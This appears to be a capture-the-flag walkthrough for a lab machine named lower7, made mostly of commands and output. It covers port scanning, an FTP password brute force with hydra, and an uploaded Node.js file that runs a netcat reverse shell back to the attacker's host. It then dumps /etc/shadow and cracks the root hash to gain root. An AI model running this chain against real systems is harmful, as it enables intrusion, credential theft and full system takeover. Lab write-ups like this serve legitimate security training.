#linux #low
sudo nmap -p- -sS --open --min-rate 5000 -Pn -n -vv 192.168.0.146 -oA nmap/lower7
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
3000/tcp open ppp syn-ack ttl 64
Last updated
nmap -p 21,3000 -sCV -vv 192.168.0.146 -oA targeted
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 2.0.8 or later
3000/tcp open http syn-ack Node.js (Express middleware)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=utf-8).ftp 192.168.0.146
Connected to 192.168.0.146.
220 "Hello a.clark, Welcome to your FTP server."hydra -t 64 -l a.clark -P /usr/share/wordlists/rockyou.txt ftp://192.168.0.146
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-23 22:32:01
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://192.168.0.146:21/
[21][ftp] host: 192.168.0.146 login: a.clark password: dragonconst { exec } = require('child_process');
module.exports = (req, res) => {
exec('busybox nc 192.168.0.136 1111 -e /bin/sh', (error, stdout) => {
res.send(`${stdout.trim()}`);
});
};nc -lnvp 1111ftp 192.168.0.146
Connected to 192.168.0.146.
220 "Hello a.clark, Welcome to your FTP server."
Name (192.168.0.146:parrot): a.clark
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put rev.js
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
192 bytes sent in 0,000114 seconds (1,61 Mbytes/s)curl -s http://192.168.0.146:3000/rev.jsnc -lnvp 1111
Listening on 0.0.0.0 1111
Connection received on 192.168.0.146 42794
id
uid=1000(a.clark) gid=1000(a.clark) grupos=1000(a.clark),42(shadow)a.clark@lower7:~$ ls
user.txt
a.clark@lower7:~$ cat user.txt a.clark@lower7:~$ groups
a.clark shadow
a.clark@lower7:~$ cat /etc/shadow
root:$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:20374:0:99999:7:::
daemon:*:19676:0:99999:7:::
bin:*:19676:0:99999:7:::
sys:*:19676:0:99999:7:::
sync:*:19676:0:99999:7:::
games:*:19676:0:99999:7:::
man:*:19676:0:99999:7:::
lp:*:19676:0:99999:7:::
mail:*:19676:0:99999:7:::
news:*:19676:0:99999:7:::
uucp:*:19676:0:99999:7:::
proxy:*:19676:0:99999:7:::
www-data:*:19676:0:99999:7:::
backup:*:19676:0:99999:7:::
list:*:19676:0:99999:7:::
irc:*:19676:0:99999:7:::
_apt:*:19676:0:99999:7:::
nobody:*:19676:0:99999:7:::
systemd-network:!*:19676::::::
messagebus:!:19676::::::
sshd:!:19676::::::
a.clark:$y$j9T$bdXHrEdVSpm8nJ883AVV//$xAqdqEdokPrYPBIgIv68qKaU08mhJoWKrnI9WdyUpZB:20374:0:99999:7:::
ftp:!:20374::::::
./yescrypt_crack -h ../hash.txt -w /usr/share/wordlists/rockyou.txt -t 32
--------------------------------------------------
| Cyclone's Yescrypt Cracker |
| https://github.com/cyclone-github/yescrypt_crack |
--------------------------------------------------
Hash file: ../hash.txt
Total Hashes: 1
CPU Threads: 4
Wordlist: /usr/share/wordlists/rockyou.txt
2025/11/23 22:48:13 Working...
2025/11/23 22:49:13 Cracked: 0/1 68.96 h/s 00h:01m:00s
2025/11/23 22:50:13 Cracked: 0/1 68.45 h/s 00h:02m:00s
2025/11/23 22:51:13 Cracked: 0/1 69.83 h/s 00h:03m:00s
2025/11/23 22:52:13 Cracked: 0/1 68.66 h/s 00h:04m:00s
$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:b*****n
2025/11/23 22:52:17 Cracked: 1/1 68.69 h/s 00h:04m:04sa.clark@lower7:~$ su root
Contraseña:
root@lower7:/home/a.clark# cd
root@lower7:~# ls
root.txt
root@lower7:~# cat root.txt